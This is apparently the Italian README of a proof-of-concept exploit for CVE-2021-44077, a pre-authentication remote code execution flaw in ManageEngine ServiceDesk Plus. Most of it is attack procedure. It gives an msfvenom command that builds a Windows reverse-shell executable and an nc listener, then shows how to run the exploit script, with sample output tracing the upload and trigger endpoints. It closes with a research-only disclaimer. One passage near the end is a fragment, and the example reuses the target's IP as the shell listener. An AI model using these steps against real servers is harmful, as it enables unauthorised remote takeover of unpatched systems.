
Exploit proof-of-concept per PreAuth RCE in ManageEngine ServiceDesk Plus (CVE-2021-44077). Carica ed esegue eseguibili Windows arbitrari su target vulnerabili.
Proof of Concept Exploit per CVE-2021-44077: PreAuth RCE in ManageEngine ServiceDesk Plus < 11306
Basato su:
Avviso CISA:
Rimedio (Aggiornare alla build 11306 o successiva):
Testato su ManageEngine ServiceDesk Plus Build 11303. Disattivato tutto l'AV.
L'exploit carica un eseguibile Windows sul target e lo esegue.
Per sfruttare la vulnerabilità, genera prima un eseguibile qualsiasi. Ad esempio:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.140 LPORT=4444 -f exe > msiexec.exe
Esegui pip install del file requirements oppure assicurati di avere il pacchetto requests.
Se stai cercando di ricevere una reverse shell, avvia prima il listener, ad esempio:
nc -l 4444
Quindi esegui lo script dell'exploit, passando gli argomenti url e exe, ad esempio:
python exploit.py http://<TARGET>:<PORT> <path_to_exe>
Esempio di output dello script:
% python exploit.py http://192.168.0.140:8080 msiexec.exe
[+] Target: http://192.168.0.140:8080/
[+] Executable: msiexec.exe
[+] Uploading msiexec.exe to http://192.168.0.140:8080/RestAPI/ImportTechnicians?step=1
[+] Got 401 error code on upload. This is expected.
[+] Uploaded msiexec.exe
[+] Attempting to invoke against url http://192.168.0.140:8080/./RestAPI/s247action. Waiting up to 20 seconds...
[+] Done, did it work?

bin dell'installazione, inclusi file esistenti come script batch. Potrebbero esserci altri modi per invocare il file caricato.Questo software è stato creato esclusivamente per scopi di ricerca accademica e per lo sviluppo di tecniche difensive efficaci, e non è destinato a essere utilizzato per attaccare sistemi se non espressamente autorizzato. I manutentori del progetto non sono responsabili per un uso improprio del software. Utilizzare in modo responsabile.